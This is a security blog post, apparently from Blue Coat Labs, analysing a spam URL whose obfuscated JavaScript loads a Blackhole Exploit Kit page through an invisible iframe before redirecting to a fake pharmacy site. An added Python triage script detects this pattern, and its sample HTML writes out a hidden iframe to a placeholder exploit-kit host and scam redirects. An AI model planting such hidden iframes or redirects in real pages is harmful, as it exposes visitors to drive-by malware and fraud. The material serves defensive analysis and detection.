Blue Coat Labs


Spam, Scam, or Malware?


Chris Larsen, Adnan Shukor

[Another great post by Adnan in our internal blog. Definitely deserves a wider audience... --C.L.]


Recently, we saw several customer submissions of a particular URL. One thing that caught my attention: the three submitters suggested three different categories for the rating. (The suggestions were: “Malicious Sources”, “Spam”, and “Scam/Questionable/Illegal”.)

The question is, do they really understand the meaning of the category they chose, or was each person seeing different things on the link/page?


So I spent some time before my lunch break, and here is my analysis of the incident.

First, all the submitters agreed that they received the URL/link in a spam email. So a “Spam” rating would certainly be accurate. Next, I tried to simply browse to the URL. It's a redirect to a scammy "Canadian Pharmacy" site:

screenshot of pharma site

(So a rating of "Scam/Questionable/Illegal" would also be reasonable.)

Here's the content of the URL before the redirection:

screenshot of obfuscated javascript

Some obfuscated JavaScript, followed by the redirection code at the bottom.

One of the submitters said that his antivirus triggered an alert as soon as he opened the URL and immediately blocked the page in the browser. This is why he chose “Malicious Source” as the suggested category. Meanwhile, another submitter said that he could only see a fake pharmacy website after clicking on the URL, which is why he went with “Scam/Questionable/Illegal”. Let’s see what is in the obfuscated JavaScript before we proceed to the conclusion:

initial de-obfuscated view of the javascript

(A code beautifier was applied to the JavaScript before the deobfuscation was performed.)

completely de-obfuscated view

Perfect! An invisible iframe to a Blackhole Exploit Kit! Browsers with JavaScript enabled will be redirected (via the iframe) to a Blackhole Exploit Kit page, and then redirected to a scam page, the fake Canadian pharmacy site. (Browsers with JavaScript disabled will just be redirected to the scammy site.)
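As an added example (not code from this post or from Blue Coat), here is a small Python triage script for the pattern described above: it scans a deobfuscated page for an invisible iframe and for redirects, and maps what each kind of visitor would see onto the categories the submitters used. The sample page, the hostnames and the scam-host list are constructed placeholders, not the real URL from the submissions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample in the shape the post describes (placeholder hostnames): an
# invisible iframe to an exploit-kit landing page, then the redirect to the scam site.
SAMPLE_HTML = """<html><body>
<iframe src="http://ek-landing.example/in.php" width="0" height="0"
        style="visibility:hidden;position:absolute;left:-1000px"></iframe>
<script>window.location.href = "http://pharma-scam.example/";</script>
<noscript><meta http-equiv="refresh" content="0;url=http://pharma-scam.example/"></noscript>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d", re.I)
JS_REDIRECT = re.compile(r"""location(?:\.href)?\s*=\s*["']([^"']+)["']|location\.replace\(\s*["']([^"']+)""", re.I)
META_URL = re.compile(r"url\s*=\s*([^\s;\"']+)", re.I)
KNOWN_SCAM_HOSTS = {"pharma-scam.example"}  # constructed stand-in for a reputation lookup

def _tiny(value):  # 0px/1px dimension: the classic invisible-iframe size
    return value.strip().lower().rstrip("px") in ("0", "1")

class PageScanner(HTMLParser):  # collects hidden iframes and redirect targets
    def __init__(self):
        super().__init__()
        self.hidden_iframes, self.redirects, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and (_tiny(a.get("width", "")) or _tiny(a.get("height", ""))
                                or HIDDEN_STYLE.search(a.get("style", ""))):
            self.hidden_iframes.append(a.get("src", ""))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.redirects += META_URL.findall(a.get("content", ""))  # JS-disabled fallback
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:  # location.href = "..." or location.replace("...")
            self.redirects += [u or v for u, v in JS_REDIRECT.findall(data)]

def triage(html, scam_hosts=KNOWN_SCAM_HOSTS):
    """Map what each kind of visitor would see onto the categories the submitters used."""
    s = PageScanner(); s.feed(html)
    categories = []
    if s.hidden_iframes:  # drive-by loader: what the AV user's alert was about
        categories.append("Malicious Sources")
    if any(urlparse(u).hostname in scam_hosts for u in s.redirects):  # what a JS-off browser sees
        categories.append("Scam/Questionable/Illegal")
    return {"hidden_iframes": s.hidden_iframes, "redirects": s.redirects, "categories": categories}
```

With JavaScript disabled only the redirect path is visible, so the script also reports just the scam category for a page that carries the redirect but no hidden iframe, matching the second submitter's view.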


So yes, it is a scam URL, but it is also a malicious URL, and it is distributed in spam mail. So everyone was correct: the URL (together with the Blackhole site and the scam site) is blocked, and everyone is safe and happy.

Thanks to everyone who took time to submit the URL! We really appreciate your efforts to submit malicious/suspicious URLs for our review. It helps everyone when we work together.

Till next time, stay safe everyone!


-- Adnan Shukor



[Other relevant details: the attack site was automatically flagged in our database by the Malnet Tracker three days ago, and was added by the Spamnet Tracker a week ago. --C.L.]